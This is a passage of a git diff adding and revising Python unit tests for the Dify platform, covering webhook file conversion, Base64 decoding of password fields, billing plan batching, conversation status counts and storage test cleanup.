"image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py new file mode 100644 index 0000000000..bf013c4bae --- /dev/null +++ b/api/tests/unit_tests/libs/test_encryption.py @@ -0,0 +1,150 @@ +""" +Unit tests for field encoding/decoding utilities. + +These tests verify Base64 encoding/decoding functionality and +proper error handling and fallback behavior. +""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" + encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" + + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/api/tests/unit_tests/models/test_app_models.py b/api/tests/unit_tests/models/test_app_models.py index 268ba1282a..e35788660d 100644 --- a/api/tests/unit_tests/models/test_app_models.py +++ b/api/tests/unit_tests/models/test_app_models.py @@ -1149,3 +1149,258 @@ class TestModelIntegration: # Assert assert site.app_id == app.id assert app.enable_site is True + + +class TestConversationStatusCount: + """Test suite for Conversation.status_count property N+1 query fix.""" + + def test_status_count_no_messages(self): + """Test status_count returns None when conversation has no messages.""" + # Arrange + conversation = Conversation( + app_id=str(uuid4()), + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = str(uuid4()) + + # Mock the database query to return no messages + with patch("models.model.db.session.scalars") as mock_scalars: + mock_scalars.return_value.all.return_value = [] + + # Act + result = conversation.status_count + + # Assert + assert result is None + + def test_status_count_messages_without_workflow_runs(self): + """Test status_count when messages have no workflow_run_id.""" + # Arrange + app_id = str(uuid4()) + conversation_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock the database query to return no messages with workflow_run_id + with patch("models.model.db.session.scalars") as mock_scalars: + mock_scalars.return_value.all.return_value = [] + + # Act + result = conversation.status_count + + # Assert + assert result is None + + def test_status_count_batch_loading_implementation(self): + """Test that status_count uses batch loading instead of N+1 queries.""" + # Arrange + from core.workflow.enums import WorkflowExecutionStatus + + app_id = str(uuid4()) + conversation_id = str(uuid4()) + + # Create workflow run IDs + workflow_run_id_1 = str(uuid4()) + workflow_run_id_2 = str(uuid4()) + workflow_run_id_3 = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock messages with workflow_run_id + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_1, + ), + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_2, + ), + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_3, + ), + ] + + # Mock workflow runs with different statuses + mock_workflow_runs = [ + MagicMock( + id=workflow_run_id_1, + status=WorkflowExecutionStatus.SUCCEEDED.value, + app_id=app_id, + ), + MagicMock( + id=workflow_run_id_2, + status=WorkflowExecutionStatus.FAILED.value, + app_id=app_id, + ), + MagicMock( + id=workflow_run_id_3, + status=WorkflowExecutionStatus.PARTIAL_SUCCEEDED.value, + app_id=app_id, + ), + ] + + # Track database calls + calls_made = [] + + def mock_scalars(query): + calls_made.append(str(query)) + mock_result = MagicMock() + + # Return messages for the first query (messages with workflow_run_id) + if "messages" in str(query) and "conversation_id" in str(query): + mock_result.all.return_value = mock_messages + # Return workflow runs for the batch query + elif "workflow_runs" in str(query): + mock_result.all.return_value = mock_workflow_runs + else: + mock_result.all.return_value = [] + + return mock_result + + # Act & Assert + with patch("models.model.db.session.scalars", side_effect=mock_scalars): + result = conversation.status_count + + # Verify only 2 database queries were made (not N+1) + assert len(calls_made) == 2, f"Expected 2 queries, got {len(calls_made)}: {calls_made}" + + # Verify the first query gets messages + assert "messages" in calls_made[0] + assert "conversation_id" in calls_made[0] + + # Verify the second query batch loads workflow runs with proper filtering + assert "workflow_runs" in calls_made[1] + assert "app_id" in calls_made[1] # Security filter applied + assert "IN" in calls_made[1] # Batch loading with IN clause + + # Verify correct status counts + assert result["success"] == 1 # One SUCCEEDED + assert result["failed"] == 1 # One FAILED + assert result["partial_success"] == 1 # One PARTIAL_SUCCEEDED + + def test_status_count_app_id_filtering(self): + """Test that status_count filters workflow runs by app_id for security.""" + # Arrange + app_id = str(uuid4()) + other_app_id = str(uuid4()) + conversation_id = str(uuid4()) + workflow_run_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock message with workflow_run_id + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id, + ), + ] + + calls_made = [] + + def mock_scalars(query): + calls_made.append(str(query)) + mock_result = MagicMock() + + if "messages" in str(query): + mock_result.all.return_value = mock_messages + elif "workflow_runs" in str(query): + # Return empty list because no workflow run matches the correct app_id + mock_result.all.return_value = [] # Workflow run filtered out by app_id + else: + mock_result.all.return_value = [] + + return mock_result + + # Act + with patch("models.model.db.session.scalars", side_effect=mock_scalars): + result = conversation.status_count + + # Assert - query should include app_id filter + workflow_query = calls_made[1] + assert "app_id" in workflow_query + + # Since workflow run has wrong app_id, it shouldn't be included in counts + assert result["success"] == 0 + assert result["failed"] == 0 + assert result["partial_success"] == 0 + + def test_status_count_handles_invalid_workflow_status(self): + """Test that status_count gracefully handles invalid workflow status values.""" + # Arrange + app_id = str(uuid4()) + conversation_id = str(uuid4()) + workflow_run_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id, + ), + ] + + # Mock workflow run with invalid status + mock_workflow_runs = [ + MagicMock( + id=workflow_run_id, + status="invalid_status", # Invalid status that should raise ValueError + app_id=app_id, + ), + ] + + with patch("models.model.db.session.scalars") as mock_scalars: + # Mock the messages query + def mock_scalars_side_effect(query): + mock_result = MagicMock() + if "messages" in str(query): + mock_result.all.return_value = mock_messages + elif "workflow_runs" in str(query): + mock_result.all.return_value = mock_workflow_runs + else: + mock_result.all.return_value = [] + return mock_result + + mock_scalars.side_effect = mock_scalars_side_effect + + # Act - should not raise exception + result = conversation.status_count + + # Assert - should handle invalid status gracefully + assert result["success"] == 0 + assert result["failed"] == 0 + assert result["partial_success"] == 0 diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage") def get_example_filename() -> str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/api/tests/unit_tests/services/test_billing_service.py b/api/tests/unit_tests/services/test_billing_service.py index 915aee3fa7..f50f744a75 100644 --- a/api/tests/unit_tests/services/test_billing_service.py +++ b/api/tests/unit_tests/services/test_billing_service.py @@ -1156,6 +1156,199 @@ class TestBillingServiceEdgeCases: assert "Only team owner or team admin can perform this action" in str(exc_info.value) +class TestBillingServiceSubscriptionOperations: + """Unit tests for subscription operations in BillingService. + + Tests cover: + - Bulk plan retrieval with chunking + - Expired subscription cleanup whitelist retrieval + """ + + @pytest.fixture + def mock_send_request(self): + """Mock _send_request method.""" + with patch.object(BillingService, "_send_request") as mock: + yield mock + + def test_get_plan_bulk_with_empty_list(self, mock_send_request): + """Test bulk plan retrieval with empty tenant list.""" + # Arrange + tenant_ids = [] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + mock_send_request.assert_not_called() + + def test_get_plan_bulk_with_chunking(self, mock_send_request): + """Test bulk plan retrieval with more than 200 tenants (chunking logic).""" + # Arrange - 250 tenants to test chunking (chunk_size = 200) + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk: tenants 0-199 + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk: tenants 200-249 + second_chunk_response = { + "data": {f"tenant-{i}": {"plan": "professional", "expiration_date": 1767225600} for i in range(200, 250)} + } + + mock_send_request.side_effect = [first_chunk_response, second_chunk_response] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 250 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert result["tenant-200"]["plan"] == "professional" + assert result["tenant-249"]["plan"] == "professional" + assert mock_send_request.call_count == 2 + + # Verify first chunk call + first_call = mock_send_request.call_args_list[0] + assert first_call[0][0] == "POST" + assert first_call[0][1] == "/subscription/plan/batch" + assert len(first_call[1]["json"]["tenant_ids"]) == 200 + + # Verify second chunk call + second_call = mock_send_request.call_args_list[1] + assert len(second_call[1]["json"]["tenant_ids"]) == 50 + + def test_get_plan_bulk_with_partial_batch_failure(self, mock_send_request): + """Test bulk plan retrieval when one batch fails but others succeed.""" + # Arrange - 250 tenants, second batch will fail + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk succeeds + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk fails - need to create a mock that raises when called + def side_effect_func(*args, **kwargs): + if mock_send_request.call_count == 1: + return first_chunk_response + else: + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should only have data from first batch + assert len(result) == 200 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert "tenant-200" not in result + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_all_batches_failing(self, mock_send_request): + """Test bulk plan retrieval when all batches fail.""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # All chunks fail + def side_effect_func(*args, **kwargs): + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should return empty dict + assert result == {} + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_exactly_200_tenants(self, mock_send_request): + """Test bulk plan retrieval with exactly 200 tenants (boundary condition).""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(200)] + mock_send_request.return_value = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 200 + assert mock_send_request.call_count == 1 + + def test_get_plan_bulk_with_empty_data_response(self, mock_send_request): + """Test bulk plan retrieval with empty data in response.""" + # Arrange + tenant_ids = ["tenant-1", "tenant-2"] + mock_send_request.return_value = {"data": {}} + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + + def test_get_expired_subscription_cleanup_whitelist_success(self, mock_send_request): + """Test successful retrieval of expired subscription cleanup whitelist.""" + # Arrange + api_response = [ + { + "created_at": "2025-10-16T01:56:17", + "tenant_id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", + "contact": "example@dify.ai", + "id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe5", + "expired_at": "2026-01-01T01:56:17", + "updated_at": "2025-10-16T01:56:17", + }, + { + "created_at": "2025-10-16T02:00:00", + "tenant_id": "tenant-2", + "contact": "test@example.com", + "id": "whitelist-id-2", + "expired_at": "2026-02-01T00:00:00", + "updated_at": "2025-10-16T02:00:00", + }, + { + "created_at": "2025-10-16T03:00:00", + "tenant_id": "tenant-3", + "contact": "another@example.com", + "id": "whitelist-id-3", + "expired_at": "2026-03-01T00:00:00", + "updated_at": "2025-10-16T03:00:00", + }, + ] + mock_send_request.return_value = {"data": api_response} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert - should return only tenant_ids + assert result == ["36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", "tenant-2", "tenant-3"] + assert len(result) == 3 + assert result[0] == "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6" + assert result[1] == "tenant-2" + assert result[2] == "tenant-3" + mock_send_request.assert_called_once_with("GET", "/subscription/cleanup/whitelist") + + def test_get_expired_subscription_cleanup_whitelist_empty_list(self, mock_send_request): + """Test retrieval of empty cleanup whitelist.""" + # Arrange + mock_send_request.return_value = {"data": []} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert + assert result == [] + assert len(result) == 0 + + class TestBillingServiceIntegrationScenarios: """Integration-style tests simulating real-world usage scenarios. diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = 